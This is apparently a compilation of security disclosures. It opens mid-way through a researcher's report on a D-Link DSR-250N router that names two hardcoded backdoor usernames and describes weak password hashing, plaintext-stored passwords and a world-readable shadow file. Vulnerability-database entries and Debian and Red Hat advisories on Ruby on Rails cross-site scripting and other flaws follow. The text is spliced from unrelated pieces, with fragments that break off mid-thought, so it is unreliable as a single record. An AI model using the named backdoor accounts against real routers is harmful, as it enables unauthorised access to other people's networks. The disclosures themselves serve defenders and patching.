nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7".
That was the account I hacked before with my previous exploit:
http://www.exploit-db.com/papers/22930/
And there is a new backdoor user "gkJ9232xXyruTRmY" introduced.
Instead of removing the backdoor, D-Link just created a new one.
* I verified this by showing the /etc/profile:
# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '
4. Vulnerability: Use of weak hash algorithms:
* In the /etc/shadow, salted DES hashes are used to store user passwords.
Since this hash type supports at most 8 characters, users can log in by just
typing the first 8 letters of their passwords when using SSH or telnet.
* An effective password length limitation of 8 characters makes brute force
attacks on user accounts very feasible, even if the user chose a longer
password.
5. Exposure: Passwords are stored as plain text in config files:
* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the
/tmp/system.db is built on boot time, reveals that all user passwords are
stored in plain text.
Example:
[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]
6. Vulnerability: Bad permissions on /etc/shadow
* This file should have 600 permissions set and not 644. It is world readable.
Pointless, since every process runs as root, no user separation is
done anyway.
DSR-250N> ls -l -a /etc/shadow
-rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
PID USER VSZ STAT COMMAND
1 root 2700 S init
2 root 0 SW< [kthreadd]
3 root 0 SW< [ksoftirqd/0]
4 root 0 SW< [events/0]
5 root 0 SW< [khelper]
8 root 0 SW< [async/mgr]
111 root 0 SW< [kblockd/0]
120 root 0 SW< [khubd]
123 root 0 SW< [kseriod]
128 root 0 SW< [kslowd]
129 root 0 SW< [kslowd]
150 root 0 SW [pdflush]
151 root 0 SW [pdflush]
152 root 0 SW< [kswapd0]
200 root 0 SW< [aio/0]
210 root 0 SW< [nfsiod]
220 root 0 SW< [crypto/0]
230 root 0 SW< [cns3xxx_spi.0]
781 root 0 SW< [mtdblockd]
860 root 0 SW< [usbhid_resumer]
874 root 0 SW< [rpciod/0]
903 root 0 SWN [jffs2_gcd_mtd4]
909 root 0 SWN [jffs2_gcd_mtd5]
918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
1049 root 2704 S /usr/sbin/telnetd -l /bin/login
1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
1141 root 37000 S /pfrm2.0/bin/sshd
1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
1560 root 0 SW< [key_timehandler]
1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
1600 root 8036 S rvgd /tmp/system.db
1612 root 0 SW [cavium]
1621 root 8424 S vpnKAd /tmp/system.db
1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
1771 root 2680 S /pfrm2.0/bin/statusD
1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
2205 root 1904 S /pfrm2.0/bin/fReset
2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
3355 root 1768 S /pfrm2.0/bin/rt2860apd
3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
5353 root 2704 S -sh
7877 root 2568 S sleep 60
7953 root 2568 S sleep 60
8008 root 2704 R ps
16749 root 2704 S -sh
25690 root 0 SW< [RtmpCmdQTask]
25692 root 0 SW< [RtmpWscTask]
DSR-250N>
| VAR-201312-0119 | CVE-2013-4492 | Ruby for i18n gem of exceptions.rb Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in exceptions.rb in the i18n gem before 0.6.6 for Ruby allows remote attackers to inject arbitrary web script or HTML via a crafted I18n::MissingTranslationData.new call. RubyGems i18n is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to RubyGems i18n 0.6.6, and 0.5.1 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2830-1 security@debian.org
http://www.debian.org/security/ Florian Weiemr
December 30, 2013 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : ruby-i18n
Vulnerability : cross-site scripting
Problem type : remote
Debian-specific: no
CVE ID : CVE-2013-4492
Peter McLarnan discovered that the internationalization component of
Ruby on Rails does not properly encode parameters in generated HTML
code, resulting in a cross-site scripting vulnerability. This update
corrects the underlying vulnerability in the i18n gem, as provided by
the ruby-i18n package.
The oldstable distribution (squeeze) is not affected by this problem;
the libi18n-ruby package does not contain the vulnerable code.
For the stable distribution (wheezy), this problem has been fixed in
version 0.6.0-3+deb7u1.
For the unstable distribution (sid), this problem has been fixed in
version 0.6.9-1.
We recommend that you upgrade your ruby-i18n packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iQEcBAEBAgAGBQJSwfRdAAoJEL97/wQC1SS+xwAH/iI7ga/tjp1b8r//lKu3BBt5
GClsPWVKd9TBEYGHTM2ipskSU9+EDOkt/vhWH9TK2C5BA0eo68b6I2Gg8Z+BQzGa
SwfQmnIee/UX3gFi+mRnppyNp1WqAxEXvRNN/1JCiVevZAUEicnUx36xUn7paLIi
T+I2iae9LrCrP11XtU0KzNeg3ktt5QOTvOHIjlsdXoDHqT8EzjGalk99qA4fVK0I
FU2as0zhN6aZtnivhoIuc4P3u4XYoKhK7R4BL4bwW1KzSr4/LqZ2PAOLRexyWDwV
HJdfcR3WyRvpuxQKVFU9XF+agjBhWU98B8BWaC7O7aTsFYpwtHdtRN6PGJgCXUA=
=GovW
-----END PGP SIGNATURE-----
| VAR-201312-0118 | CVE-2013-4491 | Ruby on Rails of internationalization Component cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/translation_helper.rb in the internationalization component in Ruby on Rails 3.x before 3.2.16 and 4.x before 4.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted string that triggers generation of a fallback string by the i18n gem. RubyGems i18n is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to RubyGems i18n 0.6.6, and 0.5.1 are vulnerable.
For the stable distribution (wheezy), these problems have been fixed in
version 3.2.6-6+deb7u1.
For the unstable distribution (sid), this problem has been fixed in
version 3.2.16-3+0 of the rails-3.2 source package.
We recommend that you upgrade your ruby-actionpack-3.2 packages. Relevant releases/architectures:
OpenStack 3 - noarch
3.
An application using a third party library, which uses the Rack::Request
interface, or custom Rack middleware could bypass the protection
implemented to fix the CVE-2013-0155 vulnerability, causing the application
to receive unsafe parameters and become vulnerable to CVE-2013-0155. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: Subscription Asset Manager 1.4 security update
Advisory ID: RHSA-2014:1863-01
Product: Red Hat Subscription Asset Manager
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1863.html
Issue date: 2014-11-17
CVE Names: CVE-2013-1854 CVE-2013-1855 CVE-2013-1857
CVE-2013-4491 CVE-2013-6414 CVE-2013-6415
CVE-2014-0130
=====================================================================
1. Summary:
Updated Subscription Asset Manager 1.4 packages that fix multiple security
issues are now available.
Red Hat Product Security has rated this update as having Important security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Subscription Asset Manager for RHEL 6 Server - noarch
3. Description:
Red Hat Subscription Asset Manager acts as a proxy for handling
subscription information and software updates on client machines. Red Hat
Subscription Asset Manager is built on Ruby on Rails, a
model-view-controller (MVC) framework for web application development.
Action Pack implements the controller and the view components.
A directory traversal flaw was found in the way Ruby on Rails handled
wildcard segments in routes with implicit rendering. A remote attacker
could use this flaw to retrieve arbitrary local files accessible to a Ruby
on Rails application using the aforementioned routes via a specially
crafted request. (CVE-2014-0130)
A flaw was found in the way Ruby on Rails handled hashes in certain
queries. A remote attacker could use this flaw to perform a denial of
service (resource consumption) attack by sending specially crafted queries
that would result in the creation of Ruby symbols, which were never garbage
collected. (CVE-2013-1854)
Two cross-site scripting (XSS) flaws were found in Action Pack. A remote
attacker could use these flaws to conduct XSS attacks against users of an
application using Action Pack. A remote attacker could possibly use this flaw to
perform a reflective cross-site scripting (XSS) attack by providing a
specially crafted input to an application using the aforementioned
component. (CVE-2013-4491)
A denial of service flaw was found in the header handling component of
Action View. A remote attacker could send strings in specially crafted
headers that would be cached indefinitely, which would result in all
available system memory eventually being consumed. (CVE-2013-6414)
It was found that the number_to_currency Action View helper did not
properly escape the unit parameter. An attacker could use this flaw to
perform a cross-site scripting (XSS) attack on an application that uses
data submitted by a user in the unit parameter. (CVE-2013-6415)
Red Hat would like to thank Ruby on Rails upstream for reporting these
issues. Upstream acknowledges Ben Murphy as the original reporter of
CVE-2013-1854, Charlie Somerville as the original reporter of
CVE-2013-1855, Alan Jenkins as the original reporter of CVE-2013-1857,
Peter McLarnan as the original reporter of CVE-2013-4491, Toby Hsieh as the
original reporter of CVE-2013-6414, and Ankit Gupta as the original
reporter of CVE-2013-6415.
All Subscription Asset Manager users are advised to upgrade to these
updated packages, which contain backported patches to correct these issues.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
921329 - CVE-2013-1854 rubygem-activerecord: attribute_dos Symbol DoS vulnerability
921331 - CVE-2013-1855 rubygem-actionpack: css_sanitization: XSS vulnerability in sanitize_css
921335 - CVE-2013-1857 rubygem-actionpack: sanitize_protocol: XSS Vulnerability in the helper of Ruby on Rails
1036483 - CVE-2013-6414 rubygem-actionpack: Action View DoS
1036910 - CVE-2013-6415 rubygem-actionpack: number_to_currency XSS
1036922 - CVE-2013-4491 rubygem-actionpack: i18n missing translation XSS
1095105 - CVE-2014-0130 rubygem-actionpack: directory traversal issue
6. Package List:
Red Hat Subscription Asset Manager for RHEL 6 Server:
Source:
katello-1.4.3.28-1.el6sam_splice.src.rpm
ruby193-rubygem-actionmailer-3.2.17-1.el6sam.src.rpm
ruby193-rubygem-actionpack-3.2.17-6.el6sam.src.rpm
ruby193-rubygem-activemodel-3.2.17-1.el6sam.src.rpm
ruby193-rubygem-activerecord-3.2.17-5.el6sam.src.rpm
ruby193-rubygem-activeresource-3.2.17-1.el6sam.src.rpm
ruby193-rubygem-activesupport-3.2.17-2.el6sam.src.rpm
ruby193-rubygem-i18n-0.6.9-1.el6sam.src.rpm
ruby193-rubygem-mail-2.5.4-1.el6sam.src.rpm
ruby193-rubygem-rack-1.4.5-3.el6sam.src.rpm
ruby193-rubygem-rails-3.2.17-1.el6sam.src.rpm
ruby193-rubygem-railties-3.2.17-1.el6sam.src.rpm
noarch:
katello-common-1.4.3.28-1.el6sam_splice.noarch.rpm
katello-glue-candlepin-1.4.3.28-1.el6sam_splice.noarch.rpm
katello-glue-elasticsearch-1.4.3.28-1.el6sam_splice.noarch.rpm
katello-headpin-1.4.3.28-1.el6sam_splice.noarch.rpm
katello-headpin-all-1.4.3.28-1.el6sam_splice.noarch.rpm
ruby193-rubygem-actionmailer-3.2.17-1.el6sam.noarch.rpm
ruby193-rubygem-actionpack-3.2.17-6.el6sam.noarch.rpm
ruby193-rubygem-activemodel-3.2.17-1.el6sam.noarch.rpm
ruby193-rubygem-activerecord-3.2.17-5.el6sam.noarch.rpm
ruby193-rubygem-activeresource-3.2.17-1.el6sam.noarch.rpm
ruby193-rubygem-activesupport-3.2.17-2.el6sam.noarch.rpm
ruby193-rubygem-i18n-0.6.9-1.el6sam.noarch.rpm
ruby193-rubygem-mail-2.5.4-1.el6sam.noarch.rpm
ruby193-rubygem-rack-1.4.5-3.el6sam.noarch.rpm
ruby193-rubygem-rails-3.2.17-1.el6sam.noarch.rpm
ruby193-rubygem-railties-3.2.17-1.el6sam.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2013-1854
https://access.redhat.com/security/cve/CVE-2013-1855
https://access.redhat.com/security/cve/CVE-2013-1857
https://access.redhat.com/security/cve/CVE-2013-4491
https://access.redhat.com/security/cve/CVE-2013-6414
https://access.redhat.com/security/cve/CVE-2013-6415
https://access.redhat.com/security/cve/CVE-2014-0130
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUai7iXlSAg2UNWIIRAmtEAJ9m+ZUXuva81fLz9G1CLKYi5aJoHACfcd3y
SoVal0zNgx0pwtSAkS1q5/0=
=i5aK
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce